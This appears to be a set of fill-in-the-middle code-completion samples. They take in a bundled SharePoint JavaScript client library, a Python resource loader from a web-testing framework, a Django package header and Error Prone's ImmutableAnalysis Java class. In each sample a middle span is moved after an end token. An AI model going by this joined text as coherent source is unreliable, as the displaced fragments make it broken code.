|| this; } /** * Returns all the webhook subscriptions or the specified webhook subscription * * @param subscriptionId The id of a specific webhook subscription to retrieve, omit to retrieve all the webhook subscriptions */ Subscriptions.prototype.getById = function (subscriptionId) { var subscription = new Subscription(this); subscription.concat("('" + subscriptionId + "')"); return subscription; }; /** * Creates a new webhook subscription * * @param notificationUrl The url to receive the notifications * @param expirationDate The date and time to expire the subscription in the form YYYY-MM-ddTHH:mm:ss+00:00 (maximum of 6 months) * @param clientState A client specific string (defaults to pnp-js-core-subscription when omitted) */ Subscriptions.prototype.add = function (notificationUrl, expirationDate, clientState) { var _this = this; var postBody = JSON.stringify({ "clientState": clientState || "pnp-js-core-subscription", "expirationDateTime": expirationDate, "notificationUrl": notificationUrl, "resource": this.toUrl(), }); return this.post({ body: postBody, headers: { "Content-Type": "application/json" } }).then(function (result) { return { data: result, subscription: _this.getById(result.id) }; }); }; return Subscriptions; }(queryable_1.QueryableCollection)); exports.Subscriptions = Subscriptions; /** * Describes a single webhook subscription instance * */ var Subscription = (function (_super) { __extends(Subscription, _super); function Subscription() { return _super !== null && _super.apply(this, arguments) || this; } /** * Renews this webhook subscription * * @param expirationDate The date and time to expire the subscription in the form YYYY-MM-ddTHH:mm:ss+00:00 (maximum of 6 months) */ Subscription.prototype.update = function (expirationDate) { var _this = this; var postBody = JSON.stringify({ "expirationDateTime": expirationDate, }); return this.patch({ body: postBody, headers: { "Content-Type": "application/json" } }).then(function (data) { return { data: data, subscription: _this }; }); }; /** * Removes this webhook subscription * */ Subscription.prototype.delete = function () { return _super.prototype.delete.call(this); }; return Subscription; }(queryable_1.QueryableInstance)); exports.Subscription = Subscription; /***/ }), /* 48 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var files_1 = __webpack_require__(52); var odata_1 = __webpack_require__(2); var UserProfileQuery = (function (_super) { __extends(UserProfileQuery, _super); /** * Creates a new instance of the UserProfileQuery class * * @param baseUrl The url or Queryable which forms the parent of this user profile query */ function UserProfileQuery(baseUrl, path) { if (path === void 0) { path = "_api/sp.userprofiles.peoplemanager"; } var _this = _super.call(this, baseUrl, path) || this; _this.profileLoader = new ProfileLoader(baseUrl); return _this; } Object.defineProperty(UserProfileQuery.prototype, "editProfileLink", { /** * The url of the edit profile page for the current user */ get: function () { return this.clone(UserProfileQuery, "EditProfileLink").getAs(odata_1.ODataValue()); }, enumerable: true, configurable: true }); Object.defineProperty(UserProfileQuery.prototype, "isMyPeopleListPublic", { /** * A boolean value that indicates whether the current user's "People I'm Following" list is public */ get: function () { return this.clone(UserProfileQuery, "IsMyPeopleListPublic").getAs(odata_1.ODataValue()); }, enumerable: true, configurable: true }); /** * A boolean value that indicates whether the current user is being followed by the specified user * * @param loginName The account name of the user */ UserProfileQuery.prototype.amIFollowedBy = function (loginName) { var q = this.clone(UserProfileQuery, "amifollowedby(@v)", true); q.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return q.get(); }; /** * A boolean value that indicates whether the current user is following the specified user * * @param loginName The account name of the user */ UserProfileQuery.prototype.amIFollowing = function (loginName) { var q = this.clone(UserProfileQuery, "amifollowing(@v)", true); q.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return q.get(); }; /** * Gets tags that the current user is following * * @param maxCount The maximum number of tags to retrieve (default is 20) */ UserProfileQuery.prototype.getFollowedTags = function (maxCount) { if (maxCount === void 0) { maxCount = 20; } return this.clone(UserProfileQuery, "getfollowedtags(" + maxCount + ")", true).get(); }; /** * Gets the people who are following the specified user * * @param loginName The account name of the user */ UserProfileQuery.prototype.getFollowersFor = function (loginName) { var q = this.clone(UserProfileQuery, "getfollowersfor(@v)", true); q.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return q.get(); }; Object.defineProperty(UserProfileQuery.prototype, "myFollowers", { /** * Gets the people who are following the current user * */ get: function () { return new queryable_1.QueryableCollection(this, "getmyfollowers"); }, enumerable: true, configurable: true }); Object.defineProperty(UserProfileQuery.prototype, "myProperties", { /** * Gets user properties for the current user * */ get: function () { return new UserProfileQuery(this, "getmyproperties"); }, enumerable: true, configurable: true }); /** * Gets the people who the specified user is following * * @param loginName The account name of the user. */ UserProfileQuery.prototype.getPeopleFollowedBy = function (loginName) { var q = this.clone(UserProfileQuery, "getpeoplefollowedby(@v)", true); q.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return q.get(); }; /** * Gets user properties for the specified user. * * @param loginName The account name of the user. */ UserProfileQuery.prototype.getPropertiesFor = function (loginName) { var q = this.clone(UserProfileQuery, "getpropertiesfor(@v)", true); q.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return q.get(); }; Object.defineProperty(UserProfileQuery.prototype, "trendingTags", { /** * Gets the 20 most popular hash tags over the past week, sorted so that the most popular tag appears first * */ get: function () { var q = this.clone(UserProfileQuery, null, true); q.concat(".gettrendingtags"); return q.get(); }, enumerable: true, configurable: true }); /** * Gets the specified user profile property for the specified user * * @param loginName The account name of the user * @param propertyName The case-sensitive name of the property to get */ UserProfileQuery.prototype.getUserProfilePropertyFor = function (loginName, propertyName) { var q = this.clone(UserProfileQuery, "getuserprofilepropertyfor(accountname=@v, propertyname='" + propertyName + "')", true); q.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return q.get(); }; /** * Removes the specified user from the user's list of suggested people to follow * * @param loginName The account name of the user */ UserProfileQuery.prototype.hideSuggestion = function (loginName) { var q = this.clone(UserProfileQuery, "hidesuggestion(@v)", true); q.query.add("@v", "'" + encodeURIComponent(loginName) + "'"); return q.post(); }; /** * A boolean values that indicates whether the first user is following the second user * * @param follower The account name of the user who might be following the followee * @param followee The account name of the user who might be followed by the follower */ UserProfileQuery.prototype.isFollowing = function (follower, followee) { var q = this.clone(UserProfileQuery, null, true); q.concat(".isfollowing(possiblefolloweraccountname=@v, possiblefolloweeaccountname=@y)"); q.query.add("@v", "'" + encodeURIComponent(follower) + "'"); q.query.add("@y", "'" + encodeURIComponent(followee) + "'"); return q.get(); }; /** * Uploads and sets the user profile picture (Users can upload a picture to their own profile only). Not supported for batching. * * @param profilePicSource Blob data representing the user's picture in BMP, JPEG, or PNG format of up to 4.76MB */ UserProfileQuery.prototype.setMyProfilePic = function (profilePicSource) { var _this = this; return new Promise(function (resolve, reject) { files_1.readBlobAsArrayBuffer(profilePicSource).then(function (buffer) { var request = new UserProfileQuery(_this, "setmyprofilepicture"); request.post({ body: String.fromCharCode.apply(null, new Uint16Array(buffer)), }).then(function (_) { return resolve(); }); }).catch(function (e) { return reject(e); }); }); }; /** * Provisions one or more users' personal sites. (My Site administrator on SharePoint Online only) * * @param emails The email addresses of the users to provision sites for */ UserProfileQuery.prototype.createPersonalSiteEnqueueBulk = function () { var emails = []; for (var _i = 0; _i < arguments.length; _i++) { emails[_i] = arguments[_i]; } return this.profileLoader.createPersonalSiteEnqueueBulk(emails); }; Object.defineProperty(UserProfileQuery.prototype, "ownerUserProfile", { /** * Gets the user profile of the site owner * */ get: function () { return this.profileLoader.ownerUserProfile; }, enumerable: true, configurable: true }); Object.defineProperty(UserProfileQuery.prototype, "userProfile", { /** * Gets the user profile for the current user */ get: function () { return this.profileLoader.userProfile; }, enumerable: true, configurable: true }); /** * Enqueues creating a personal site for this user, which can be used to share documents, web pages, and other files * * @param interactiveRequest true if interactively (web) initiated request, or false (default) if non-interactively (client) initiated request */ UserProfileQuery.prototype.createPersonalSite = function (interactiveRequest) { if (interactiveRequest === void 0) { interactiveRequest = false; } return this.profileLoader.createPersonalSite(interactiveRequest); }; /** * Sets the privacy settings for this profile * * @param share true to make all social data public; false to make all social data private */ UserProfileQuery.prototype.shareAllSocialData = function (share) { return this.profileLoader.shareAllSocialData(share); }; return UserProfileQuery; }(queryable_1.QueryableInstance)); exports.UserProfileQuery = UserProfileQuery; var ProfileLoader = (function (_super) { __extends(ProfileLoader, _super); /** * Creates a new instance of the ProfileLoader class * * @param baseUrl The url or Queryable which forms the parent of this profile loader */ function ProfileLoader(baseUrl, path) { if (path === void 0) { path = "_api/sp.userprofiles.profileloader.getprofileloader"; } return _super.call(this, baseUrl, path) || this; } /** * Provisions one or more users' personal sites. (My Site administrator on SharePoint Online only) * * @param emails The email addresses of the users to provision sites for */ ProfileLoader.prototype.createPersonalSiteEnqueueBulk = function (emails) { return this.clone(ProfileLoader, "createpersonalsiteenqueuebulk").post({ body: JSON.stringify({ "emailIDs": emails }), }); }; Object.defineProperty(ProfileLoader.prototype, "ownerUserProfile", { /** * Gets the user profile of the site owner. * */ get: function () { var q = this.getParent(ProfileLoader, this.parentUrl, "_api/sp.userprofiles.profileloader.getowneruserprofile"); if (this.hasBatch) { q = q.inBatch(this.batch); } return q.postAs(); }, enumerable: true, configurable: true }); Object.defineProperty(ProfileLoader.prototype, "userProfile", { /** * Gets the user profile of the current user. * */ get: function () { return this.clone(ProfileLoader, "getuserprofile", true).postAs(); }, enumerable: true, configurable: true }); /** * Enqueues creating a personal site for this user, which can be used to share documents, web pages, and other files. * * @param interactiveRequest true if interactively (web) initiated request, or false (default) if non-interactively (client) initiated request */ ProfileLoader.prototype.createPersonalSite = function (interactiveRequest) { if (interactiveRequest === void 0) { interactiveRequest = false; } return this.clone(ProfileLoader, "getuserprofile/createpersonalsiteenque(" + interactiveRequest + ")", true).post(); }; /** * Sets the privacy settings for this profile * * @param share true to make all social data public; false to make all social data private. */ ProfileLoader.prototype.shareAllSocialData = function (share) { return this.clone(ProfileLoader, "getuserprofile/shareallsocialdata(" + share + ")", true).post(); }; return ProfileLoader; }(queryable_1.Queryable)); /***/ }), /* 49 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var util_1 = __webpack_require__(0); /** * Describes the views available in the current context * */ var Views = (function (_super) { __extends(Views, _super); /** * Creates a new instance of the Views class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Views(baseUrl, path) { if (path === void 0) { path = "views"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a view by guid id * * @param id The GUID id of the view */ Views.prototype.getById = function (id) { var v = new View(this); v.concat("('" + id + "')"); return v; }; /** * Gets a view by title (case-sensitive) * * @param title The case-sensitive title of the view */ Views.prototype.getByTitle = function (title) { return new View(this, "getByTitle('" + title + "')"); }; /** * Adds a new view to the collection * * @param title The new views's title * @param personalView True if this is a personal view, otherwise false, default = false * @param additionalSettings Will be passed as part of the view creation body */ /*tslint:disable max-line-length */ Views.prototype.add = function (title, personalView, additionalSettings) { var _this = this; if (personalView === void 0) { personalView = false; } if (additionalSettings === void 0) { additionalSettings = {}; } var postBody = JSON.stringify(util_1.Util.extend({ "PersonalView": personalView, "Title": title, "__metadata": { "type": "SP.View" }, }, additionalSettings)); return this.clone(Views, null, true).postAs({ body: postBody }).then(function (data) { return { data: data, view: _this.getById(data.Id), }; }); }; return Views; }(queryable_1.QueryableCollection)); exports.Views = Views; /** * Describes a single View instance * */ var View = (function (_super) { __extends(View, _super); function View() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(View.prototype, "fields", { get: function () { return new ViewFields(this); }, enumerable: true, configurable: true }); /** * Updates this view intance with the supplied properties * * @param properties A plain object hash of values to update for the view */ View.prototype.update = function (properties) { var _this = this; var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.View" }, }, properties)); return this.post({ body: postBody, headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { return { data: data, view: _this, }; }); }; /** * Delete this view * */ View.prototype.delete = function () { return this.post({ headers: { "X-HTTP-Method": "DELETE", }, }); }; /** * Returns the list view as HTML. * */ View.prototype.renderAsHtml = function () { return this.clone(queryable_1.Queryable, "renderashtml", true).get(); }; return View; }(queryable_1.QueryableInstance)); exports.View = View; var ViewFields = (function (_super) { __extends(ViewFields, _super); function ViewFields(baseUrl, path) { if (path === void 0) { path = "viewfields"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a value that specifies the XML schema that represents the collection. */ ViewFields.prototype.getSchemaXml = function () { return this.clone(queryable_1.Queryable, "schemaxml", true).get(); }; /** * Adds the field with the specified field internal name or display name to the collection. * * @param fieldTitleOrInternalName The case-sensitive internal name or display name of the field to add. */ ViewFields.prototype.add = function (fieldTitleOrInternalName) { return this.clone(ViewFields, "addviewfield('" + fieldTitleOrInternalName + "')", true).post(); }; /** * Moves the field with the specified field internal name to the specified position in the collection. * * @param fieldInternalName The case-sensitive internal name of the field to move. * @param index The zero-based index of the new position for the field. */ ViewFields.prototype.move = function (fieldInternalName, index) { return this.clone(ViewFields, "moveviewfieldto", true).post({ body: JSON.stringify({ "field": fieldInternalName, "index": index }), }); }; /** * Removes all the fields from the collection. */ ViewFields.prototype.removeAll = function () { return this.clone(ViewFields, "removeallviewfields", true).post(); }; /** * Removes the field with the specified field internal name from the collection. * * @param fieldInternalName The case-sensitive internal name of the field to remove from the view. */ ViewFields.prototype.remove = function (fieldInternalName) { return this.clone(ViewFields, "removeviewfield('" + fieldInternalName + "')", true).post(); }; return ViewFields; }(queryable_1.QueryableCollection)); exports.ViewFields = ViewFields; /***/ }), /* 50 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var LimitedWebPartManager = (function (_super) { __extends(LimitedWebPartManager, _super); function LimitedWebPartManager() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(LimitedWebPartManager.prototype, "webparts", { /** * Gets the set of web part definitions contained by this web part manager * */ get: function () { return new WebPartDefinitions(this, "webparts"); }, enumerable: true, configurable: true }); /** * Exports a webpart definition * * @param id the GUID id of the definition to export */ LimitedWebPartManager.prototype.export = function (id) { return this.clone(LimitedWebPartManager, "ExportWebPart", true).post({ body: JSON.stringify({ webPartId: id }), }); }; /** * Imports a webpart * * @param xml webpart definition which must be valid XML in the .dwp or .webpart format */ LimitedWebPartManager.prototype.import = function (xml) { return this.clone(LimitedWebPartManager, "ImportWebPart", true).post({ body: JSON.stringify({ webPartXml: xml }), }); }; return LimitedWebPartManager; }(queryable_1.Queryable)); exports.LimitedWebPartManager = LimitedWebPartManager; var WebPartDefinitions = (function (_super) { __extends(WebPartDefinitions, _super); function WebPartDefinitions() { return _super !== null && _super.apply(this, arguments) || this; } /** * Gets a web part definition from the collection by id * * @param id GUID id of the web part definition to get */ WebPartDefinitions.prototype.getById = function (id) { return new WebPartDefinition(this, "getbyid('" + id + "')"); }; return WebPartDefinitions; }(queryable_1.QueryableCollection)); exports.WebPartDefinitions = WebPartDefinitions; var WebPartDefinition = (function (_super) { __extends(WebPartDefinition, _super); function WebPartDefinition() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(WebPartDefinition.prototype, "webpart", { /** * Gets the webpart information associated with this definition */ get: function () { return new WebPart(this); }, enumerable: true, configurable: true }); /** * Removes a webpart from a page, all settings will be lost */ WebPartDefinition.prototype.delete = function () { return this.clone(WebPartDefinition, "DeleteWebPart", true).post(); }; return WebPartDefinition; }(queryable_1.QueryableInstance)); exports.WebPartDefinition = WebPartDefinition; var WebPart = (function (_super) { __extends(WebPart, _super); /** * Creates a new instance of the WebPart class * * @param baseUrl The url or Queryable which forms the parent of this fields collection * @param path Optional, if supplied will be appended to the supplied baseUrl */ function WebPart(baseUrl, path) { if (path === void 0) { path = "webpart"; } return _super.call(this, baseUrl, path) || this; } return WebPart; }(queryable_1.QueryableInstance)); exports.WebPart = WebPart; /***/ }), /* 51 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var logging_1 = __webpack_require__(5); function deprecated(message) { return function (target, propertyKey, descriptor) { var method = descriptor.value; descriptor.value = function () { var args = []; for (var _i = 0; _i < arguments.length; _i++) { args[_i] = arguments[_i]; } logging_1.Logger.log({ data: { descriptor: descriptor, propertyKey: propertyKey, target: target, }, level: logging_1.LogLevel.Warning, message: message, }); return method.apply(this, args); }; }; } exports.deprecated = deprecated; /***/ }), /* 52 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); /** * Reads a blob as text * * @param blob The data to read */ function readBlobAsText(blob) { return readBlobAs(blob, "string"); } exports.readBlobAsText = readBlobAsText; /** * Reads a blob into an array buffer * * @param blob The data to read */ function readBlobAsArrayBuffer(blob) { return readBlobAs(blob, "buffer"); } exports.readBlobAsArrayBuffer = readBlobAsArrayBuffer; /** * Generic method to read blob's content * * @param blob The data to read * @param mode The read mode */ function readBlobAs(blob, mode) { return new Promise(function (resolve, reject) { try { var reader = new FileReader(); reader.onload = function (e) { resolve(e.target.result); }; switch (mode) { case "string": reader.readAsText(blob); break; case "buffer": reader.readAsArrayBuffer(blob); break; } } catch (e) { reject(e); } }); } /***/ }) /******/ ]); }); //# sourceMappingURL=pnp.js.map<|fim▁end|>
/** * Removes the cross-site group with the specified name from the collection
<|file_name|>resource_manager.py<|end_file_name|><|fim▁begin|>from framework.db import models from framework.config import config from framework.dependency_management.dependency_resolver import BaseComponent from framework.dependency_management.interfaces import ResourceInterface from framework.lib.general import cprint import os import logging from framework.utils import FileOperations class ResourceDB(BaseComponent, ResourceInterface): COMPONENT_NAME = "resource" def __init__(self): self.register_in_service_locator() self.config = self.get_component("config") self.db_config = self.get_component("db_config") self.target = self.get_component("target") self.db = self.get_component("db") self.LoadResourceDBFromFile(self.config.get_profile_path("RESOURCES_PROFILE")) def LoadResourceDBFromFile(self, file_path): # This needs to be a list instead of a dictionary to preserve order in python < 2.7<|fim▁hole|> # because we may have updated the resource self.db.session.query(models.Resource).filter_by(dirty=False).delete() # resources = [(Type, Name, Resource), (Type, Name, Resource),] for Type, Name, Resource in resources: self.db.session.add(models.Resource(resource_type=Type, resource_name=Name, resource=Resource)) self.db.session.commit() def GetResourcesFromFile(self, resource_file): resources = set() ConfigFile = FileOperations.open(resource_file, 'r').read().splitlines() # To remove stupid '\n' at the end for line in ConfigFile: if '#' == line[0]: continue # Skip comment lines try: Type, Name, Resource = line.split('_____') # Resource = Resource.strip() resources.add((Type, Name, Resource)) except ValueError: cprint("ERROR: The delimiter is incorrect in this line at Resource File: "+str(line.split('_____'))) return resources def GetReplacementDict(self): configuration = self.db_config.GetReplacementDict() configuration.update(self.target.GetTargetConfig()) configuration.update(self.config.GetReplacementDict()) return configuration def GetRawResources(self, ResourceType): filter_query = self.db.session.query(models.Resource.resource_name, models.Resource.resource).filter_by(resource_type = ResourceType) # Sorting is necessary for working of ExtractURLs, since it must run after main command, so order is imp sort_query = filter_query.order_by(models.Resource.id) raw_resources = sort_query.all() return raw_resources def GetResources(self, ResourceType): replacement_dict = self.GetReplacementDict() raw_resources = self.GetRawResources(ResourceType) resources = [] for name, resource in raw_resources: resources.append([name, self.config.MultipleReplace(resource, replacement_dict)]) return resources def GetRawResourceList(self, ResourceList): raw_resources = self.db.session.query(models.Resource.resource_name, models.Resource.resource).filter(models.Resource.resource_type.in_(ResourceList)).all() return raw_resources def GetResourceList(self, ResourceTypeList): replacement_dict = self.GetReplacementDict() raw_resources = self.GetRawResourceList(ResourceTypeList) resources = [] for name, resource in raw_resources: resources.append([name, self.config.MultipleReplace(resource, replacement_dict)]) return resources<|fim▁end|>
logging.info("Loading Resources from: " + file_path + " ..") resources = self.GetResourcesFromFile(file_path) # Delete all old resources which are not edited by user
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|><|fim▁hole|> __version__ = '1.1.0' default_app_config = 'ipware.apps.AppConfig'<|fim▁end|>
# -*- coding: utf-8 -*-
<|file_name|>ImmutableAnalysis.java<|end_file_name|><|fim▁begin|>/* * Copyright 2016 The Error Prone Authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.errorprone.bugpatterns.threadsafety; import com.google.common.collect.ImmutableList; import com.google.common.collect.ImmutableSet; import com.google.errorprone.VisitorState; import com.google.errorprone.annotations.CheckReturnValue; import com.google.errorprone.annotations.Immutable; import com.google.errorprone.annotations.ImmutableTypeParameter; import com.google.errorprone.annotations.concurrent.LazyInit; import com.google.errorprone.bugpatterns.BugChecker; import com.google.errorprone.bugpatterns.threadsafety.ThreadSafety.Purpose; import com.google.errorprone.bugpatterns.threadsafety.ThreadSafety.Violation; import com.google.errorprone.fixes.SuggestedFix; import com.google.errorprone.fixes.SuggestedFixes; import com.google.errorprone.matchers.Description; import com.google.errorprone.util.ASTHelpers; import com.sun.source.tree.ClassTree; import com.sun.source.tree.Tree; import com.sun.tools.javac.code.Symbol; import com.sun.tools.javac.code.Symbol.ClassSymbol; import com.sun.tools.javac.code.Symbol.TypeVariableSymbol; import com.sun.tools.javac.code.Symbol.VarSymbol; import com.sun.tools.javac.code.Type; import com.sun.tools.javac.code.Type.ClassType; import java.util.Collection; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.Optional; import java.util.Set; import java.util.function.Predicate; import javax.lang.model.element.ElementKind; import javax.lang.model.element.Modifier; import javax.lang.model.type.TypeKind; /** Analyzes types for deep immutability. */ public class ImmutableAnalysis { private final BugChecker bugChecker; private final VisitorState state; private final WellKnownMutability wellKnownMutability; private final ThreadSafety threadSafety; ImmutableAnalysis( BugChecker bugChecker, VisitorState state, WellKnownMutability wellKnownMutability, ImmutableSet<String> immutableAnnotations) { this.bugChecker = bugChecker; this.state = state; this.wellKnownMutability = wellKnownMutability; this.threadSafety = ThreadSafety.builder() .setPurpose(Purpose.FOR_IMMUTABLE_CHECKER) .knownTypes(wellKnownMutability) .markerAnnotations(immutableAnnotations) .typeParameterAnnotation(ImmutableTypeParameter.class) .build(state); } public ImmutableAnalysis( BugChecker bugChecker, VisitorState state, WellKnownMutability wellKnownMutability) { this(bugChecker, state, wellKnownMutability, ImmutableSet.of(Immutable.class.getName())); } Violation isThreadSafeType( boolean allowContainerTypeParameters, Set<String> containerTypeParameters, Type type) { return threadSafety.isThreadSafeType( allowContainerTypeParameters, containerTypeParameters, type); } boolean hasThreadSafeTypeParameterAnnotation(TypeVariableSymbol sym) { return threadSafety.hasThreadSafeTypeParameterAnnotation(sym); } Violation checkInstantiation( Collection<TypeVariableSymbol> classTypeParameters, Collection<Type> typeArguments) { return threadSafety.checkInstantiation(classTypeParameters, typeArguments); } public Violation checkInvocation(Type methodType, Symbol symbol) { return threadSafety.checkInvocation(methodType, symbol); } /** Accepts {@link Violation violations} that are found during the analysis. */ @FunctionalInterface public interface ViolationReporter { Description.Builder describe(Tree tree, Violation info); @CheckReturnValue default Description report(Tree tree, Violation info, Optional<SuggestedFix> suggestedFix) { Description.Builder description = describe(tree, info); suggestedFix.ifPresent(description::addFix); return description.build(); } } /** * Check that an {@code @Immutable}-annotated class: * * <ul> * <li>does not declare or inherit any mutable fields, * <li>any immutable supertypes are instantiated with immutable type arguments as required by * their containerOf spec, and * <li>any enclosing instances are immutable. * </ul> * * requiring supertypes to be annotated immutable would be too restrictive. */ public Violation checkForImmutability( Optional<ClassTree> tree, ImmutableSet<String> immutableTyParams, ClassType type, ViolationReporter reporter) { Violation info = areFieldsImmutable(tree, immutableTyParams, type, reporter); if (info.isPresent()) { return info; } for (Type interfaceType : state.getTypes().interfaces(type)) { AnnotationInfo interfaceAnnotation = getImmutableAnnotation(interfaceType.tsym, state); if (interfaceAnnotation == null) { continue; } info = threadSafety.checkSuperInstantiation( immutableTyParams, interfaceAnnotation, interfaceType); if (info.isPresent()) { return info.plus( String.format( "'%s' extends '%s'", threadSafety.getPrettyName(type.tsym), threadSafety.getPrettyName(interfaceType.tsym))); } } if (!type.asElement().isEnum()) { // don't check enum super types here to avoid double-reporting errors<|fim▁hole|> if (info.isPresent()) { return info; } } Type mutableEnclosing = threadSafety.mutableEnclosingInstance(tree, type); if (mutableEnclosing != null) { return info.plus( String.format( "'%s' has mutable enclosing instance '%s'", threadSafety.getPrettyName(type.tsym), mutableEnclosing)); } return Violation.absent(); } private Violation checkSuper(ImmutableSet<String> immutableTyParams, ClassType type) { ClassType superType = (ClassType) state.getTypes().supertype(type); if (superType.getKind() == TypeKind.NONE || state.getTypes().isSameType(state.getSymtab().objectType, superType)) { return Violation.absent(); } if (WellKnownMutability.isAnnotation(state, type)) { // TODO(b/25630189): add enforcement return Violation.absent(); } AnnotationInfo superannotation = getImmutableAnnotation(superType.tsym, state); String message = String.format( "'%s' extends '%s'", threadSafety.getPrettyName(type.tsym), threadSafety.getPrettyName(superType.tsym)); if (superannotation != null) { // If the superclass does happen to be immutable, we don't need to recursively // inspect it. We just have to check that it's instantiated correctly: Violation info = threadSafety.checkSuperInstantiation(immutableTyParams, superannotation, superType); if (!info.isPresent()) { return Violation.absent(); } return info.plus(message); } // Recursive case: check if the supertype is 'effectively' immutable. Violation info = checkForImmutability( Optional.<ClassTree>empty(), immutableTyParams, superType, new ViolationReporter() { @Override public Description.Builder describe(Tree tree, Violation info) { return bugChecker .buildDescription(tree) .setMessage(info.plus(info.message()).message()); } }); if (!info.isPresent()) { return Violation.absent(); } return info.plus(message); } /** * Check a single class' fields for immutability. * * @param immutableTyParams the in-scope immutable type parameters * @param classType the type to check the fields of */ Violation areFieldsImmutable( Optional<ClassTree> tree, ImmutableSet<String> immutableTyParams, ClassType classType, ViolationReporter reporter) { ClassSymbol classSym = (ClassSymbol) classType.tsym; if (classSym.members() == null) { return Violation.absent(); } Predicate<Symbol> instanceFieldFilter = symbol -> symbol.getKind() == ElementKind.FIELD && !symbol.isStatic(); Map<Symbol, Tree> declarations = new HashMap<>(); if (tree.isPresent()) { for (Tree member : tree.get().getMembers()) { Symbol sym = ASTHelpers.getSymbol(member); if (sym != null) { declarations.put(sym, member); } } } // javac gives us members in reverse declaration order // handling them in declaration order leads to marginally better diagnostics List<Symbol> members = ImmutableList.copyOf(ASTHelpers.scope(classSym.members()).getSymbols(instanceFieldFilter)) .reverse(); for (Symbol member : members) { Optional<Tree> memberTree = Optional.ofNullable(declarations.get(member)); Violation info = isFieldImmutable( memberTree, immutableTyParams, classSym, classType, (VarSymbol) member, reporter); if (info.isPresent()) { return info; } } return Violation.absent(); } /** Check a single field for immutability. */ private Violation isFieldImmutable( Optional<Tree> tree, ImmutableSet<String> immutableTyParams, ClassSymbol classSym, ClassType classType, VarSymbol var, ViolationReporter reporter) { if (bugChecker.isSuppressed(var)) { return Violation.absent(); } if (!var.getModifiers().contains(Modifier.FINAL) && !ASTHelpers.hasAnnotation(var, LazyInit.class, state)) { Violation info = Violation.of( String.format( "'%s' has non-final field '%s'", threadSafety.getPrettyName(classSym), var.getSimpleName())); if (tree.isPresent()) { // If we have a tree to attach diagnostics to, report the error immediately instead of // accumulating the path to the error from the top-level class being checked state.reportMatch( reporter.report( tree.get(), info, SuggestedFixes.addModifiers(tree.get(), state, Modifier.FINAL))); return Violation.absent(); } return info; } Type varType = state.getTypes().memberType(classType, var); Violation info = threadSafety.isThreadSafeType( /* allowContainerTypeParameters= */ true, immutableTyParams, varType); if (info.isPresent()) { info = info.plus( String.format( "'%s' has field '%s' of type '%s'", threadSafety.getPrettyName(classSym), var.getSimpleName(), varType)); if (tree.isPresent()) { // If we have a tree to attach diagnostics to, report the error immediately instead of // accumulating the path to the error from the top-level class being checked state.reportMatch(reporter.report(tree.get(), info, Optional.empty())); return Violation.absent(); } return info; } return Violation.absent(); } /** * Gets the {@link Symbol}'s {@code @Immutable} annotation info, either from an annotation on the * symbol or from the list of well-known immutable types. */ AnnotationInfo getImmutableAnnotation(Symbol sym, VisitorState state) { String nameStr = sym.flatName().toString(); AnnotationInfo known = wellKnownMutability.getKnownImmutableClasses().get(nameStr); if (known != null) { return known; } return threadSafety.getInheritedAnnotation(sym, state); } /** * Gets the {@link Tree}'s {@code @Immutable} annotation info, either from an annotation on the * symbol or from the list of well-known immutable types. */ AnnotationInfo getImmutableAnnotation(Tree tree, VisitorState state) { Symbol sym = ASTHelpers.getSymbol(tree); return sym == null ? null : threadSafety.getMarkerOrAcceptedAnnotation(sym, state); } }<|fim▁end|>
info = checkSuper(immutableTyParams, type);
